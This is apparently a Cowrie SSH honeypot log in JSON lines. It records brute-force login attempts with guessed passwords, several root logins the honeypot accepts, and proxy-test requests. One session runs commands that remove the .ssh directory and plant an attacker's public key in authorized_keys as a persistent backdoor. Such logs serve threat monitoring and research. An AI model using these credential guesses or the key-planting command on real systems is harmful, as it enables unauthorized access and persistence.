{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65080,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c6911109f49","protocol":"ssh","message":"New connection: 217.72.205.35:65080 (1.2.3.4:22) [session: 9c6911109f49]","sensor":"my-vps","timestamp":"2025-08-26T13:09:20.836498Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:20.837701Z","src_ip":"217.72.205.35","session":"9c6911109f49"}
{"eventid":"cowrie.session.closed","duration":12.501928329467773,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:23.905916Z","src_ip":"61.227.119.66","session":"d6ce919ce9f5"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":9425,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5d5feabf5e1","protocol":"ssh","message":"New connection: 80.94.95.112:9425 (1.2.3.4:22) [session: d5d5feabf5e1]","sensor":"my-vps","timestamp":"2025-08-26T13:09:25.849324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T13:09:25.851337Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T13:09:25.881477Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ronald1","message":"login attempt [admin/ronald1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:26.091005Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rodger","message":"login attempt [admin/rodger] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:27.123198Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"robyn","message":"login attempt [admin/robyn] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:28.155550Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"robson","message":"login attempt [admin/robson] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:29.187937Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"riptide","message":"login attempt [admin/riptide] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:30.221105Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:31.253204Z","src_ip":"80.94.95.112","session":"d5d5feabf5e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34064,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d8587dcafa8","protocol":"ssh","message":"New connection: 212.227.125.160:34064 (1.2.3.4:22) [session: 6d8587dcafa8]","sensor":"my-vps","timestamp":"2025-08-26T13:09:54.775705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:09:54.776921Z","src_ip":"212.227.125.160","session":"6d8587dcafa8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:09:54.827131Z","src_ip":"212.227.125.160","session":"6d8587dcafa8"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana123","message":"login attempt [solana/solana123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:54.978889Z","src_ip":"212.227.125.160","session":"6d8587dcafa8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:56.031464Z","src_ip":"212.227.125.160","session":"6d8587dcafa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47560,"dst_ip":"1.2.3.4","dst_port":22,"session":"64adb0c8a817","protocol":"ssh","message":"New connection: 212.227.235.229:47560 (1.2.3.4:22) [session: 64adb0c8a817]","sensor":"my-vps","timestamp":"2025-08-26T13:09:57.447292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:09:57.448325Z","src_ip":"212.227.235.229","session":"64adb0c8a817"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:09:57.690510Z","src_ip":"212.227.235.229","session":"64adb0c8a817"}
{"eventid":"cowrie.login.failed","username":"devops","password":"devops@123","message":"login attempt [devops/devops@123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:58.698522Z","src_ip":"212.227.235.229","session":"64adb0c8a817"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40574,"dst_ip":"1.2.3.4","dst_port":22,"session":"de72ab1c821a","protocol":"ssh","message":"New connection: 212.227.235.229:40574 (1.2.3.4:22) [session: de72ab1c821a]","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.083102Z"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":60408,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8db70157f65","protocol":"ssh","message":"New connection: 93.123.109.189:60408 (1.2.3.4:22) [session: c8db70157f65]","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.372752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.373380Z","src_ip":"93.123.109.189","session":"c8db70157f65"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.394028Z","src_ip":"93.123.109.189","session":"c8db70157f65"}
{"eventid":"cowrie.login.failed","username":"liquidity","password":"liquidity","message":"login attempt [liquidity/liquidity] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.455314Z","src_ip":"93.123.109.189","session":"c8db70157f65"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.896864Z","src_ip":"212.227.235.229","session":"de72ab1c821a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.898055Z","src_ip":"212.227.235.229","session":"de72ab1c821a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:59.943091Z","src_ip":"212.227.235.229","session":"64adb0c8a817"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:00.477638Z","src_ip":"93.123.109.189","session":"c8db70157f65"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE123qwe","message":"login attempt [root/QWE123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:05.223321Z","src_ip":"212.227.235.229","session":"de72ab1c821a"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:06.157600Z","src_ip":"212.227.235.229","session":"de72ab1c821a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53871,"dst_ip":"1.2.3.4","dst_port":22,"session":"459bc19c7669","protocol":"ssh","message":"New connection: 212.227.235.229:53871 (1.2.3.4:22) [session: 459bc19c7669]","sensor":"my-vps","timestamp":"2025-08-26T13:10:08.855175Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3661,"dst_ip":"1.2.3.4","dst_port":22,"session":"80d25bc699b4","protocol":"ssh","message":"New connection: 213.209.150.239:3661 (1.2.3.4:22) [session: 80d25bc699b4]","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.168514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.169882Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.217500Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.453540Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":2524,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:2524","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.503348Z","session":"80d25bc699b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.550631Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17797,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17797","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.689920Z","session":"80d25bc699b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.737525Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:17.785593Z","src_ip":"213.209.150.239","session":"80d25bc699b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55060,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e89b057f96a","protocol":"ssh","message":"New connection: 212.227.235.229:55060 (1.2.3.4:22) [session: 4e89b057f96a]","sensor":"my-vps","timestamp":"2025-08-26T13:10:23.654558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:23.655550Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:23.910364Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.login.success","username":"root","password":"123$qweR","message":"login attempt [root/123$qweR] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:24.954289Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:10:25.476632Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:10:25.477399Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:10:25.478172Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:25.730245Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:10:26.352737Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:10:26.353472Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:10:26.607393Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:26.608531Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55062,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e9ca4ba2862","protocol":"ssh","message":"New connection: 212.227.235.229:55062 (1.2.3.4:22) [session: 7e9ca4ba2862]","sensor":"my-vps","timestamp":"2025-08-26T13:10:26.849781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:26.850650Z","src_ip":"212.227.235.229","session":"7e9ca4ba2862"}
